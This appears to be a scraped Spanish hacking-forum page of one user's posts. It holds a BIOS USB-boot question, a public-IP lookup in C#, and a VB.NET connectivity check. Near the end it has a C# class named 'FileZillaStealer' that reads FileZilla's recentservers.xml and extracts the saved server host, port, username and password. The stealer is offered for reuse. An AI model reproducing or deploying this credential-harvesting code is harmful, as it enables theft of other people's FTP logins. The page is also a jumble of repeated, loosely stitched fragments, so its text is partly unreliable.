No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
En el menu boot del setup en donde dice USB/CD pone NA, y en la cmd esa solo pone el _ y nada mas y no me deja escribir
Averigua sobre el tipo de tu BIOS y como arrancar via USB
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
En el menu boot del setup en donde dice USB/CD pone NA, y en la cmd esa solo pone el _ y nada mas y no me deja escribir
public void Ver_IP_Publica(ref string sIP)
{
// _____________________________
//|Función: Ver IP Publica |
//|Autor: Bloc |
//|Fecha Publicada: 07/09/2013 |
//|Requisitos: Dejar fuente |
//|Uso: string sIP = null; |
//| Ver_Ip_Publica(ref sIP) |
//|Nota: Usamos: |
//| using System.Net; |
//|_____________________________|
string webIP = "http://checkip.dyndns.org";
string sDownCad,scad,scad2;
WebClient DwnIP = new WebClient();
sDownCad = DwnIP.DownloadString(webIP);
char[] sborr1 = { '<', 'h','t','m','l','>','e','a','d','i','b','o','d','y','C','u','r','n',' ','I','P','c','k','/','A','s',':'};
scad = sDownCad.TrimStart(sborr1);
scad2 = scad.Replace("</body>", "");
sIP = scad2.Replace("</html>", "");
}
MessageBox.Show(sIP);
Function Verificar_conexion_a_internet()
'Nombre: Verificar conexión a internet
'Autor: Bloc
'Fecha Publicada: 13/08/2013
If My.Computer.Network.IsAvailable = True Then
Try
If My.Computer.Network.Ping("www.google.com", 10) Then
MsgBox("Si hay conexión a internet", MsgBoxStyle.Information)
End If
Catch ex As Exception
MsgBox("No hay conexión a internet", MsgBoxStyle.Critical)
End Try
End If
End Function
namespace FileZillaStealer
{
class FileZillaStealer
{
public void FileZillaStealer()
{
//Nombre: Filezilla Stealer
//Autor: Bloc
//Fecha Publicada: 11/08/2013
//Requerimientos: Dejar la fuente.
string DocumentoXml = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() + "\\Filezilla\\recentservers.xml";
string StrHost;
string StrPort;
string StrUser;
string StrPass;
DataSet Ds = new DataSet();
Ds.ReadXml(DocumentoXml);
StrHost = Ds.Tables["Server"].Rows[0]["Host"].ToString();
StrPort = Ds.Tables["Server"].Rows[0]["Port"].ToString();
StrUser = Ds.Tables["Server"].Rows[0]["User"].ToString();
StrPass = Ds.Tables["Server"].Rows[0]["Pass"].ToString();
}
}
}